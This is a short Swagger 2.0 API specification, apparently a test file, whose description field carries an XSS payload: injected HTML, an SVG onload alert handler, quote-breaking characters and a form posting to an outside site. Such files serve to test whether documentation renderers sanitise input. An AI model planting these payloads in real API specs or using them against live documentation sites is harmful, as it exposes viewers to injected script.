swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    123123<h1>123</h1><form action=https://brutelogic.com.br/gym.php method=POST><Svg/OnLoad=alert(1)>//"><input type=submit value=XSS></form>

  version: production
